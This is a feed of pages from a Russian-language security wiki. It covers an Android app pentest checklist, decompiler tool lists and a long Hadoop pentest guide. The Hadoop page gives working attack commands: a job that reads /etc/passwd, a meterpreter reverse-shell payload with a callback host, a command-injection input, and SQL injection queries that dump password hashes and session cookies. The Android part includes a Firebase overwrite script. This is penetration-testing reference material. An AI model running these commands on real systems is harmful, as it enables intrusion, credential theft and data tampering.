InformationSecurity WIKI - Новые страницы [ru]

OAuth

2026-01-30T13:45:14Z

Drakylar:

[[Категория:Web]]

Страница посвящена OAuth и тому, как тестировать ее безопасность

= Основная информация =

== Алгоритм работы ==

=== OAuth 1.0 ===

=== OAuth 2.0 ===

= Атаки =

= Ссылки =

== Документация ==

[https://habr.com/ru/articles/77648/| Habr - Oauth 1.0]

[https://habr.com/ru/companies/vk/articles/115163/| Habr - Oauth 2.0]

== Программы ==

== Лаборатории ==

Android

2024-02-17T23:05:45Z

Drakylar: /* Список проверок */

[[Категория:Pentest]]

Страница посвящена тестированию на проникновение Android-приложений.

= Этап I - получение APK =

== С устройства ==

== Из интернета ==

= Этап II - Распаковка приложения =

= Этап III - получение исходных кодов =

= Этап IV - включение отладки =

= Этап VI - патчинг =

== .smali ==

== .java ==

= Этап V - подключение frida =

= Этап VI - переупаковка приложения =

= Этап VII - добавление подписи =

= Этап VIII - сборка приложения =

= Этап IX - запуск приложения =

== На эмуляторе ==

== На устройстве ==

= Список проверок =

== Наличие обфускации ==

Как правило относится только к Java-коду но в редких случаях и к native-библиотекам.

=== Проверка ===

Для Java - достаточно посмотреть читается ли декомпилированный код или нет.

Для Native сложнее - нужно открыть ее в дизассемблере и уже смотреть статьи по обфускации кода (например добавление Virtual Machine в ассемблерный код)

=== Эксплуатация ===

Просто чтение кода и изучение используемых алгоритмов.

=== Исправление ===

Использовать бесплатные или платные(лучше) обфускаторы кода.

=== Ссылки ===

== ROOT detection ==

Определяет есть ли на устройстве рут или нет.

=== Проверка ===

Либо поиск по ключевым словам "root", "safetynet api", "play integrity" либо запуск на рутованном девайсе

Также часть решений могут детектить по работе с директориями которые по-умолчанию закрыты (например /etc/)

TODO

=== Эксплуатация ===

Отсутствует, просто best-practice

=== Исправление ===

Добавление детекта например на базе платных продуктов или Play Integrity API.

=== Ссылки ===

== Устаревший SafetyNetAPI ==

Использование устаревшего SafetyNetAPI для проверки целостности, рута и тд.

=== Проверка ===

Поиск в коде по строке "SafetyNet".

=== Эксплуатация ===

Magisc Bypass - https://github.com/kdrag0n/safetynet-fix/

Zygisk Bypass with detection evasion https://github.com/kdrag0n/safetynet-fix/issues/269

Youtube - https://www.youtube.com/watch?v=2J4QHsB5lsA

=== Исправление ===

Использовать новый Play Integrity

=== Ссылки ===

https://developer.android.com/privacy-and-security/safetynet/attestation

https://developer.android.com/privacy-and-security/safetynet/deprecation-timeline

https://developer.android.com/google/play/integrity

== Отсутствие проверки на контейнеризацию ==

Китайцы опубликовали новое решение под названием MultiApp - https://github.com/WaxMoon/MultiApp и демо-приложением https://github.com/WaxMoon/MultiAppDemo и именно это приложение легло в основу VCamera. VCamera использует "HackAPI" которое указано в "MultiApp".

Позволяет запускать другое приложение в контейнере с (как я понял) перехватом части системных вызовов, например камеры.

=== Проверка ===

Самая быстрая проверка - скачивание VCamera и тестирование с приложением https://play.google.com/store/apps/details?id=virtual.camera.app&hl=en_GB

=== Эксплуатация ===

На данный момент самое простое - VCamera и показать что камера была подменена.

=== Исправление ===

Проверки надо делать в Native-коде (С/C++ код) приложения с вызовом syscall

пример такой проверки - https://github.com/andvipgroup/VCamera/blob/f12f0b9c7131948b9369dd50aee3f3a23ab249e1/check_env_demo/code/native-lib.cpp

Почему так можно определить окружение? Как я понял, потому что хуки если и можно вешать, то не на системные функции ядра (по крайней мере без рута), поэтому вызов системных функций из Native-кода позволяет определить такую виртуализацию.

=== Ссылки ===

https://play.google.com/store/apps/details?id=virtual.camera.app&hl=en_GB

https://github.com/WaxMoon/MultiApp

https://github.com/WaxMoon/MultiAppDemo

== Секреты в коде ==

Спрятанные в коде секреты

=== Проверка ===

1. Искать самому секреты по ключевым словам

2. Использовать SemGrep для поиска секретов

3. Использовать автоматические утилиты (например, MobSF) которые ищут в тч секреты

=== Эксплуатация ===

В зависимости от полученного секрета.

=== Исправление ===

Убрать секреты из кода приложения (иногда меняя архитектуру системы).

=== Ссылки ===

== Остаточная информация ==

Поиск остаточной информации после компиляции в коде приложения.

=== Проверка ===

Что за информация может быть:

1. Private URLs

2. IP-addresses

3. Private API-endpoints

4. Полный путь компиляции (включая имя пользователя)

5. ...

Поиск опять же с SemGrep, MobSF или вручную.

=== Эксплуатация ===

Зависит от полученной информации, обычно не эксплуатируется отдельно от других уязвимостей.

=== Исправление ===

(Просто удалите если оно не требуется)

=== Ссылки ===

== Небезопасные привилегии ==

В AndroidManifest.xml есть список привилегий приложения.
Некоторые из них могут быть опасны.

=== Проверка ===

Обычно можно не мучиться и дать MobSF проверить привилегии.

JadX может распаковать AndroidManifest.xml и перевести его в читаемый формат.

=== Эксплуатация ===

В зависимости от привилегий, но как правила это просто best-practise.

=== Исправление ===

Отключение ненужных или опасных привилегий.

=== Ссылки ===

== FireBase Misconfiguration ==

Различные мисконфиги сервиса FireBase по сбору логов.

=== Проверка ===

Поиск по подстроке "firebase" - поиск firebase url.

=== Эксплуатация ===

Один из вариантов - попытаться сдампить FireBase DB.

Пример - вы нашли URL test.firebaseio.com

Попробуйте открыть test.firebaseio.com/.json - если есть бд то уязвимо.

Другой вариант - сделать PUT запрос на
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import requests
data= {"Exploit":"Successfull", "H4CKED BY": "Sheikh Rishad"}
reponse = requests.put("https://test.firebaseio.com/.json", json=data)
</syntaxhighlight>

И проверить заменились ли данные. Но! Осторожнее мб бд перезаписывает.

=== Исправление ===

TODO

=== Ссылки ===

https://cyberweapons.medium.com/misconfigured-firebase-db-on-both-android-and-web-apps-a85927e4678f

https://hackerone.com/reports/1065134

== AndroidManifest.xml - Debug ==

Включенный дебаг позволяет отладчику с ADB подключаться и отлаживать приложение.

=== Проверка ===

<syntaxhighlight lang="xml" line="1" enclose="div" style="overflow-x:scroll" >
debuggable="true"
</syntaxhighlight>

Поиск этой строки в AndroidManifest.xml

Также это можно найти автоматически с MobSF.

=== Эксплуатация ===

Обычно проще всего это сделать в AndroidStudio - выбрать устройство для отладки при открытом APK-файле.

=== Исправление ===

<syntaxhighlight lang="xml" line="1" enclose="div" style="overflow-x:scroll" >
debuggable="false"
</syntaxhighlight>

=== Ссылки ===

== AndroidManifest.xml - Backup ==

Включенная возможность бекапить приложение с настройками.

=== Проверка ===

<syntaxhighlight lang="xml" line="1" enclose="div" style="overflow-x:scroll" >
android:allowBackup="true"
</syntaxhighlight>

Поиск этой строки в AndroidManifest.xml

Также это можно найти автоматически с MobSF.

=== Эксплуатация ===

Для Samsung мб нужно будет удалить безопасное хранилище Knox.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
adb shell pm list packages -f -3
# Список приложений
...
# Замените на ссылку приложения
adb pull /data/app/org.fedorahosted.freeotp-Rbf2NWw6F-SqSKD7fZ_voQ==/base.apk freeotp.apk
</syntaxhighlight>

=== Исправление ===

<syntaxhighlight lang="xml" line="1" enclose="div" style="overflow-x:scroll" >
android:allowBackup="false"
</syntaxhighlight>

=== Ссылки ===

https://gist.github.com/AnatomicJC/e773dd55ae60ab0b2d6dd2351eb977c1

== TEST ==

Краткое_описание

=== Проверка ===

=== Эксплуатация ===

=== Исправление ===

=== Ссылки ===

== TEST ==

Краткое_описание

=== Проверка ===

=== Эксплуатация ===

=== Исправление ===

=== Ссылки ===

= Ссылки =

Ios

2024-02-17T23:00:02Z

Drakylar: Новая страница: «Категория:Pentest Страница посвящена тестированию на проникновение IOS-приложений.»

[[Категория:Pentest]]

Страница посвящена тестированию на проникновение IOS-приложений.

Unity

2022-09-11T10:21:59Z

Drakylar: Новая страница: «= Утилиты = * Unity Assets Bundle Extractor * devx * quickbms * UAVx32 * UnityAssetsExplorer»

= Утилиты =

* Unity Assets Bundle Extractor
* devx
* quickbms
* UAVx32
* UnityAssetsExplorer

Python

2022-09-11T10:20:53Z

Drakylar: Новая страница: «= Утилиты = * exetractor * PyInstallerExtractor * pyREtic * uncompyle6 * unpy2exe»

= Утилиты =

* exetractor
* PyInstallerExtractor
* pyREtic
* uncompyle6
* unpy2exe

Net framework

2022-09-11T10:20:03Z

Drakylar: Новая страница: «= Утилиты = * ILSpy * NET Reflector * ReClass.Net * Telerik * dnSpy»

= Утилиты =

* ILSpy
* NET Reflector
* ReClass.Net
* Telerik
* dnSpy

Java

2022-09-11T10:19:21Z

Drakylar: Новая страница: «= Утилиты = * ClassEditor * dnSpy * jadx * Java Decompiler * JByteMod * Bytecode-Viewer * cfr * luyten * procyon-decompiler * Jeb Decompiler»

= Утилиты =

* ClassEditor
* dnSpy
* jadx
* Java Decompiler
* JByteMod
* Bytecode-Viewer
* cfr
* luyten
* procyon-decompiler
* Jeb Decompiler

Adobe flash

2022-09-11T10:18:12Z

Drakylar: Новая страница: «= Утилиты = * ffdec * Flash Decompiler Trillix»

= Утилиты =

* ffdec
* Flash Decompiler Trillix

Delphi

2022-09-11T10:17:41Z

Drakylar: Новая страница: «=Утилиты= * Delphi DeDe * Interactive Delphi Reconstructor * Revendepro»

=Утилиты=

* Delphi DeDe
* Interactive Delphi Reconstructor
* Revendepro

Basic

2022-09-11T10:15:45Z

Drakylar:

=Утилиты=

* VB Decompiler Pro

Hadoop

2022-09-01T09:11:50Z

Drakylar: /* Admin service */

= Общее =

== Получение конфига ==

Несколько вариантов получения конфига Hadoop. Он может потребоваться для работы с ним через CLI. Конфиг обычно в формате XML.

=== Сервисы ===

==== WebUI ====

Для этого требуется перейти на один из следующих веб серверов на страницу /conf:

* HDFS WebUI (много потов)
* JobHistory (19888, 19890) - в приоритете
* ResourceManager (8088, 8090)
. . .

=== Уязвимости ===

Иногда конфиг можно скачать используя уязвимости ПО.

==== Cloudera Manager ====

Конфиг будет доступен по следующему адресу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
http://<cloudera_mgr_ip>:7180/cmf/services/<service_id_to_iterate>/client-config
</syntaxhighlight>

service_id_to_iterate - можно получить перебором 0-100(или больше).

=== Автоматически ===

==== HadoopSnooper ====

https://github.com/wavestone-cdt/hadoop-attack-library/blob/master/Tools%20Techniques%20and%20Procedures/Getting%20the%20target%20environment%20configuration/hadoopsnooper.py

Позволяет скачать файлы конфига:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
python hadoopsnooper.py 192.168.38.28 --nn hdfs://192.168.38.128:8020
</syntaxhighlight>

== Аутентификация ==

По-умолчанию simple (то есть отключена, можно выдавать себя за любого). Можно переключить на kerberos. За это отвечает параметр в конфиге hadoop.security.authentication.

== Шифрование ==

По-умолчанию отключено для передачи (in-transit) и хранения (at-rest).

=== NameNode ===

Для общения с NameNode могут быть использованы следующие механизмы аутентификации:

- GSS-API

- Digest-MD5

=== Web Apps ===

Как правило, используется SSL/TLS.

=== DataNodes ===

Шифрование может быть на 2 уровнях:

1. обмен ключами используя 3DES или RC4

2. Шифрование используя AES 128(default)/192/256.

=== At-rest ===

Означает хранилище файлов. Если кратко:

* Данные шифруются DEK-ключем (Data Encryption Key)

* DEK зашифрован ключем EZ (Encryption Zone) -> EDEK (Encrypted Data Encryption Key)

Обратный процесс:

* EDEK запрашивается у NameNode

* Запрашиваем KMS расшифровать EDEK - получаем DEK

* Расшифровываем или зашифровываем данные с DEK.

Важно! Чтобы запросить ключ у KMS, в случае использования Access Control List (ACL) нужны привилегии.

== Поиск сервисов ==

=== nmap ===

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
nmap -sV -Pn --open -v -p ПОРТЫ_ТУТ --scripts "*hadoop* or *hbase* or *flume*" АДРЕСА
</syntaxhighlight>

== Общие атаки ==

=== Node RCE ===

Для этого требуется получить конфиг и настроить hadoop cli.

path_to_hadoop_streaming.jar - файл, который развертывается на нодах. Обычно он уже есть в установленном hadoop-cli по адресу /share/hadoop/tools/lib/hadoop-streaming-2.7.3.jar

Создаем задачу MapReduce:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
hadoop jar <path_to_hadoop_streaming.jar> \
-input /non_empty_file_on_HDFS \
-output /output_directory_on_HDFS \
-mapper "/bin/cat /etc/passwd" \
-reducer NONE
</syntaxhighlight>

Читаем результат команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
hadoop fs –ls /output_directory_on_HDFS
hadoop fs –cat /output_directory_on_HDFS/part-00000
</syntaxhighlight>

Также результат команды можно увидеть в WebUI в консоли созданной задачи.

Из интересного: нельзя выбрать ноду, на которой запускается задача. Поэтому требуется запускать команду много раз, пока она не запустится на нужной.

Бонус: эксплоит можно сгенерировать с msfvenom:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.38.1 -f elf -o msf.payload

hadoop jar <path_to_hadoop_streaming.jar>
-input /non_empty_file_on_HDFS \
-output /output_directory_on_HDFS \
-mapper "./msf.payload" \
-reducer NONE \
-file msf.payload \
-background
</syntaxhighlight>

=== RCE - CVE-2016-5393 ===

'''Уязвимая версия:''' Hadoop 2.6.x < 2.6.5 and 2.7.x < 2.7.3

'''Требования:''' должен быть авторизован и у кластера должны быть включены параметры "org.apache.hadoop.security.ShellBasedUnixGroupsMapping" и "hadoop.security.group.mapping" (конфиг core-site.xml)

Cуть в том, что функция получения групп для пользователя не экранирует специальные символы и вставляет строку в "bash -c":
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
hdfs groups '$(ping 127.0.0.1)'
</syntaxhighlight>

Второй вариант - через WebHDFS. Но для этого требуется "Simple Auth":
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
.../?user.name=$(ping+127.0.0.1)
</syntaxhighlight>

Подробнее: https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Hadoop%20components%20vulnerabilities/Hadoop%20Common/CVE-2016-5393%20-%20Authenticated%20command%20execution%20as%20the%20hdfs%20user

= HDFS =

HDFS (Hadoop FileSystem) - это виртуальная файловая система Hadoop, доступная по сети.

== Сервисы ==

=== MasterNode (NameNode) WebUI ===

Это веб-интерфейс, запущенный на портах 50070(http) и 50470(https). Обычно на нем отсутствует аутентификация, поэтому его можно использовать для доступа к файловой системе.

Основная страница доступна по адресу /explorer.html, а при выборе даты перенаправляет на соответствующую DataNode (порт 50075).

=== MasterNode Metadata Service ===

Использует протокол IPC на портах 8020 и 9000. Требуется для взаимодействия с метадатой файлов HDFS.

Команды для взаимодействия:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
# Получение списка файлов (и их метадаты)
hadoop fs -ls /tmp
</syntaxhighlight>

=== DataNode WebUI ===

Веб-интерфейс для доступа к статусу, логам и тд. Запускается на 50075(http) и 50475(https) портах.

Доступно по пути /browseDirectory.jsp

==== hdfsbrowser.py ====
Для взаимодействия с ним можно воспользоваться скриптом https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures/Browsing%20the%20HDFS%20datalake :

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
# В скрипте также можно указать порт, протокол
python hdfsbrowser.py 10.10.10.10
</syntaxhighlight>

Интересно, что утилита автоматически подставляет нужного пользователя - владельца файла или ноды.

==== hadoop cli ====

Для получения списка файлов требуется в переменной окружения "HADOOP_USER_NAME" указать нужного пользователя, например, root или hbase:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
export HADOOP_USER_NAME=hbase
hadoop fs -ls /hbase
hadoop fs –cat /output_directory_on_HDFS/part-00000
</syntaxhighlight>

Для этого может потребоваться конфиг hadoop (в основной главе)

=== DataNode Data Transfer ===

Сервис для передачи данных в DataNode. Использует порт 50010

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
# Отправить файл на HDFS
hadoop fs -put <localfile> <remotedst>
</syntaxhighlight>

=== DataNode Metadata Service ===

Использует протокол IPC на порту 50020. Требуется для взаимодействия с метадатой файлов HDFS.

=== Secondary Node Checkpoint Service (Secondary NameNode WebUI) ===

Запущен на порту 50090 по протоколу http. Как понял используется для сохранения данных метадаты (запасное хранилище).

= YARN =

== Интерфейсы (сервисы) ==

=== Application Manager ===

Порт(tcp): 8032

Протокол: http

Аутентификация: ???

Параметр в конфиге : yarn.resourcemanager.address

=== Scheduler ===

Порт(tcp): 8030

Протокол: http

Аутентификация: ???

Параметр в конфиге : yarn.resourcemanager.scheduler.address

=== ResourceManager Web Application ===

Порт(tcp): 8088, 8090

Протокол: http(8088), https(8090)

Аутентификация: ???

Параметр в конфиге : yarn.resourcemanager.webapp.address, yarn.resourcemanager.webapp.https.address

=== ResourceManager Tracker ===

Порт(tcp): 8031

Протокол: ???

Аутентификация: ???

Параметр в конфиге : yarn.resourcemanager.resource-tracker.address

=== ResourceManager Admin ===

Порт(tcp): 8033

Протокол: ???

Аутентификация: ???

Параметр в конфиге : yarn.resourcemanager.admin.address

=== NodeManager СontainerManager ===

Порт(tcp): 0

Протокол: ???

Аутентификация: ???

Параметр в конфиге : yarn.nodemanager.address

=== NodeManager Localizer ===

Порт(tcp): 8040

Протокол: ??? (IPC)

Аутентификация: ???

Параметр в конфиге: yarn.nodemanager.localizer.address

=== NodeManager Collector Service ===

Порт(tcp): 8048

Протокол: ??? (IPC)

Аутентификация: ???

Параметр в конфиге: yarn.nodemanager.collector-service.address

=== NodeManager WebUI ===

Порт(tcp): 8042, 8044

Протокол: http(8042), https(8044)

Аутентификация: ???

Параметр в конфиге: yarn.nodemanager.webapp.address, yarn.nodemanager.webapp.https.address

=== NodeManager Timeline RPC ===

Порт(tcp): 10200

Протокол: ???

Аутентификация: ???

Параметр в конфиге: yarn.timeline-service.address

=== NodeManager Timeline WebUI ===

Порт(tcp): 8188, 8190

Протокол: http(8188), https(8190)

Аутентификация: ???

Параметр в конфиге: yarn.timeline-service.webapp.address, yarn.timeline-service.webapp.https.address

=== SharedCacheManager Admin ===

Порт(tcp): 8047

Протокол: ???

Аутентификация: ???

Параметр в конфиге: yarn.sharedcache.admin.address

=== SharedCacheManager WebUI ===

Порт(tcp): 8788

Протокол: ???(http)

Аутентификация: ???

Параметр в конфиге: yarn.sharedcache.webapp.address

=== SharedCacheManager Node Manager ===

Порт(tcp): 8046

Протокол: ???

Аутентификация: ???

Параметр в конфиге: yarn.sharedcache.uploader.server.address

=== SharedCacheManager Client ===

Порт(tcp): 8045

Протокол: ???

Аутентификация: ???

Параметр в конфиге : yarn.sharedcache.client-server.address

=== NodeManager AMRMProxyService ===

Порт(tcp): 8049

Протокол: ???

Аутентификация: ???

Параметр в конфиге : yarn.nodemanager.amrmproxy.address

=== Router WebUI ===

Порт(tcp): 8089, 8091

Протокол: http(8089), https(8091)

Аутентификация: ???

Параметр в конфиге : yarn.router.webapp.address, yarn.router.webapp.https.address

=== HttpFS (Hadoop HDFS over HTTP) ===

Порт(tcp): 14000, 14001

Протокол: http(14000), 14001(https)

Аутентификация: ???

= Apache HBASE =

= ZooKeeper =

= Apache Ambari =

Нужен для упрощения управления кластерами Hadoop, используя WebUI. Есть возможность интегрироваться с другими приложениями по REST API.

Из интересного:

- Все могут авторизоваться (даже стандартные юзеры)

- Нет защиты (directory listing, no cookie flags, no CSRF)

- CVE-2015-1775 - /logs/ логи

== Сервисы ==

=== WebUI ===

Общение по протоколу http (порт 8080) и https (порт 8440).

=== Registration/Heartbeat ===

Общение по протоколу https на порту 8441.

=== Agent ===

Порт 8670/tcp используется для Ping.

= Apache Spark =

= Apache Kafka/Storm =

= Apache HIVE / DRILL =

= Mahout =

= Apache Solr / Lucene =

= Apache Ranger =

Компонент безопасности Hadoop с открытым исходным кодом.

Из интересного:

- Поддержка Kerberos

- REST API

- Журналы аудита

- Модель разрешений на основе политики доступа (политики, юзеры, группы)

Интересные ИБ-проблемы:

- Slow HTTP DOS

- Все юзеры могут авторизоваться в Ranger (но не все - выполнять действия)

- CVE-2015-0266 - Missing function level access control, можно использовать для повышения привилегий

- CVE-2015-0265 - XSS в UserAgent

TODO: изучить как работает

https://ranger.apache.org/apidocs/index.html - API документация

== Сервисы ==

=== Admin WebUI ===

Порт: 6080, 6182

Протокол: http(6180),https(6182)

Параметр конфига: ranger.service.http.port, ranger.service.https.port

==== Уязвимости ====

* Скачивание политик без аутентификации. Но нужно знать имя политики. (версия меньше или равна 0.5.2)
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/service/plugins/policies/download/<policy_name>
</syntaxhighlight>
Подробнее: https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Third-party%20modules%20vulnerabilities/Apache%20Ranger/Unauthenticated%20policy%20download

* CVE-2016-2174 - SQL injection.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/service/plugins/policies/eventTime?eventTime=' or '1'='1&policyId=1

# post-exploitation: скачать хеши паролей пользователей (md5 или sha512):
select last_name, first_name, email, login_id, password, user_role from x_portal_user, x_portal_user_role where x_portal_user.id = x_portal_user_role.user_id limit 3

# post-exploitation: скачать сессии(куки) пользователей):
select auth_time, login_id, ext_sess_id from x_auth_sess where auth_status = 1 or (login_id like '%admin%' and auth_status = 1) order by auth_time desc limit 3
</syntaxhighlight>
Подробнее: https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Third-party%20modules%20vulnerabilities/Apache%20Ranger/CVE-2016-2174%20-%20Authenticated%20SQL%20injection

=== UNIX Auth Service ===

Порт: 5151

Протокол: SSL/TCP

Параметр конфига: ranger.usersync.port

=== Ranger KMS ===

Порт: 9292, 9293

Протокол: http(9292), https(9293)

Параметр конфига: ranger.service.http.port, ranger.service.https.port

=== Solr Audit ===

Порт: 6083, 6183

Протокол: http(6083), https(6183)

Параметр конфига: ranger-admin (???)

= OOZIE =

Серверная система планирования рабочих процессов для управления заданиями Hadoop. Рабочие процессы в Oozie определяются как набор потоков управления и узлов действий в ориентированном ациклическом графе.

== Сервисы ==

=== Web Console ===

Порт: 11000, 11443

Протокол: HTTP(11000), HTTPS(11443)

=== Admin service ===

Порт: 11001

Протокол: ???

= PIG =

= Apache Hue =

Облачный редактор SQL с открытым исходным кодом. Упоминается тут тк часто используется вместе с Hadoop. Использует порт 8888 по протоколу HTTP.

В старых версиях также присутствует DOM XSS, включена отладка, есть заголовок X-Frame-Options: ALLOWALL.

= MapReduce =

Модель распределённых вычислений от компании Google, используемая в технологиях Big Data для параллельных вычислений над очень большими (до нескольких петабайт) наборами данных в компьютерных кластерах, и фреймворк для вычисления распределенных задач на узлах (node) кластера

== Сервисы ==

=== Jobhistory ===

Порт: 10020

Протокол: HTTP

Аутентификация: ???

Параметр конфига: mapreduce.jobhistory.address

=== JobTracker ===

Порт: 8021

Протокол: IPC

Аутентификация: ???

Параметр конфига: mapred.job.tracker

Доступно только в MapReduce v1

=== JobTracker WebUI v1 ===

Порт: 50030

Протокол: HTTP

Аутентификация: ???

Параметр конфига: mapred.job.tracker.http.address

Доступно только в MapReduce v1

=== Jobhistory WebUI v2 ===

Порт: 19888, 19890

Протокол: HTTP(19888), HTTPS(19890)

Аутентификация: ???

Параметр конфига: mapreduce.jobhistory.webapp.address, mapreduce.jobhistory.webapp.https.address

Доступен только в MapReduce v2

=== Jobhistory Shufflee ===

Порт: 13562

Протокол: HTTP

Аутентификация: ???

Параметр конфига: mapreduce.shuffle.port

=== Jobhistory Shufflee WebUI ===

Порт: 19890

Протокол: HTTPS

Аутентификация: ???

Параметр конфига: mapreduce.jobhistory.webapp.https.address

=== TaskTracker WebUI v1 ===

Порт: 50060

Протокол: HTTP

Аутентификация: ???

Параметр конфига: mapred.task.tracker.http.address

Доступно только в MapReduce v1

=== History Server WebUI ===

Порт: 51111

Протокол: HTTP

Аутентификация: ???

Параметр конфига: mapreduce.history.server.http.address

= Cloudera =

Экосистема Hadoop от компании Cloudera

== Сервисы ==

=== HUE ===

Работает на порту 8888 по протоколу HTTP.

==== Уязвимости ====

* CVE-2016-4947 - вычисление пользователей из непривилегированного аккаунта (версия меньше или равна 3.9.0):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/desktop/api/users/autocomplete
</syntaxhighlight>

* CVE-2016-4946 - хранимая XSS (версия меньше или равна 3.9.0). Находится во вкладке Hue Users - Edit user в полях First name и Last name.

* Open redirect (версия меньше или равна 3.9.0).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/accounts/login/?next=//[domain_name]
</syntaxhighlight>

=== Manager ===

Работает на порту 7180(http) и 7183(https).

==== Уязвимости ====

* Получение списка пользователей (версия меньше или равна 5.5)
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/api/v1/users
</syntaxhighlight>

* Вычисление пользовательских сессий из непривилегированного аккаунта (CVE-2016-4950) (версия меньше или равна 5.5):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/api/v1/users/sessions
</syntaxhighlight>

* Доступ к логам процесса(process_id можно перебрать) (версия меньше или равна 5.5):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/cmf/process/<process_id>/logs?filename={stderr,stdout}.log
</syntaxhighlight>

* CVE-2016-4948 - Stored XSS (версия меньше или равна 5.5)

* CVE-2016-4948 - Reflected XSS (версия меньше или равна 5.5):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/cmf/cloudera-director/redirect?classicWizard=[XSS]&clusterid=1
</syntaxhighlight>

= Утилиты =

== Hadoop Attack Library ==

https://github.com/wavestone-cdt/hadoop-attack-library

=== hadoopsnooper.py ===
https://github.com/wavestone-cdt/hadoop-attack-library/blob/master/Tools%20Techniques%20and%20Procedures/Getting%20the%20target%20environment%20configuration/

Скрипт для получения конфига hadoop

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
python hadoopsnooper.py 192.168.38.28 --nn hdfs://192.168.38.128:8020
</syntaxhighlight>

=== hdfsbrowser.py ===

https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures/Browsing%20the%20HDFS%20datalake

Скрипт для рааботы с WebHDFS. В скрипте также можно указать порт, протокол
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
python hdfsbrowser.py 10.10.10.10
</syntaxhighlight>

= Ссылки =

== Видео ==

== Статьи ==

== Презентации ==

https://2015.zeronights.org/assets/files/03-Kaluzny.pdf

https://2016.zeronights.ru/wp-content/uploads/2016/12/Wavestone-ZeroNights-2016-Hadoop-safari-Hunting-for-vulnerabilities-v1.0.pdf